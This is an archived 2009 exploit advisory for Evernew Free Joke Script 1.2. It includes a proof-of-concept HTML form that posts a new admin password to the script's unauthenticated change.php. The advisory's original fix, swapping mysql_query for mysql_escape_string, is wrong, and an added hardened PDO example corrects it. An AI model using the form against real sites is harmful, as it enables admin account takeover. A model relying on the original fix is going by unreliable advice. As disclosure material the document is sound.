Vendor: Free Joke Script
By: Hakxer
CVSS: 7.5 HIGH
Remote Change Password
CWE: 89
Product Name: Free Joke Script
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:evernew:free_joke_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Evernew Free Joke Script 1.2 => Remote Change Password

A vulnerability exists in Evernew Free Joke Script 1.2 which allows an attacker to remotely change the password of the admin. The cause is line 10 of change.php, where $result is set to the return value of a mysql_query call whose SQL string embeds $pass without any input validation. This can be exploited to inject malicious SQL commands which can be used to change the password of the admin.

Mitigation:

The issue can be mitigated by using mysql_escape_string instead of mysql_query in the change.php file.
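
Note that mysql_escape_string only escapes a string and does not send a query, so swapping it in for mysql_query would stop the UPDATE from running at all. The following added example (not the vendor's code and not the fix from the advisory) shows one way to harden the line-10 update with a bound parameter, plus a session check and a CSRF token check. The function name, the is_admin session flag, the csrf field, the 12-character minimum, the password hashing and the in-memory SQLite database are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example (not the vendor's code). Hypothetical: change_admin_password(),
// the 'is_admin' session flag and the 'csrf' field. Table/column are from line 10.
function change_admin_password(PDO $db, array $session, array $post): string
{
    // 1. Only an already authenticated admin may reach the UPDATE.
    if (empty($session['is_admin'])) {
        return 'denied: not logged in';
    }
    // 2. Reject cross-site form posts: the token must match the session's.
    $known = (string)($session['csrf'] ?? '');
    $token = $post['csrf'] ?? '';
    if ($known === '' || !is_string($token) || !hash_equals($known, $token)) {
        return 'denied: bad token';
    }
    // 3. Validate the input instead of trusting it.
    $pass = $post['password'] ?? '';
    if (!is_string($pass) || strlen($pass) < 12) {
        return 'denied: password too short';
    }
    // 4. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('UPDATE admin SET password = :hash');
    $stmt->execute([':hash' => password_hash($pass, PASSWORD_DEFAULT)]);
    return 'changed';
}

// Constructed demo data: in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE admin (password TEXT)");
$db->exec("INSERT INTO admin VALUES ('old')");

$session = ['is_admin' => true, 'csrf' => bin2hex(random_bytes(16))];
$quoted  = "it's-a-long-passphrase";   // constructed value containing a quote

// Request with no admin session and no token: refused before any SQL runs.
echo change_admin_password($db, [], ['password' => $quoted]), "\n";
// Logged-in admin with a valid token: the value is hashed and stored intact.
$post = ['password' => $quoted, 'csrf' => $session['csrf']];
echo change_admin_password($db, $session, $post), "\n";
$stored = $db->query('SELECT password FROM admin')->fetchColumn();
var_dump(password_verify($quoted, $stored));
```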

Exploit-DB raw data:

<!--
  Discovered & Exploited by : Hakxer
  Evernew Free Joke Script 1.2 => Remote Change Password
 
  [=>] Bug detail
  bug in change.php file
  in line 10 :
  $result=mysql_query("update admin set password='$pass'");
 -----------------------
 
  [=>] Fix
  $result=mysql_escape_string("update admin set password='$pass'");
  change mysql_query to mysql_escape_string
 
  [=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends
!-->
<form action="http://www.site.com/script/admin/change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">
<font class="text"><b>enter password to change it in admin :D</b></font> <br />
<br/>
<table width="305" height="106" border="0" cellpadding="5" cellspacing="0">
<tr>
<td width="103" class="text">Password : </td>
<td width="182"><div align="left">
<input name="password" type="password" class="style7" id="password" />
</div></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input name="Submit" type="submit" class="text_1" value="Change Password" />
</div></td>
</tr>
<tr>
<td colspan="2"><?php echo($msg); ?> </td>
</tr>
</table>
</form>

# milw0rm.com [2009-06-15]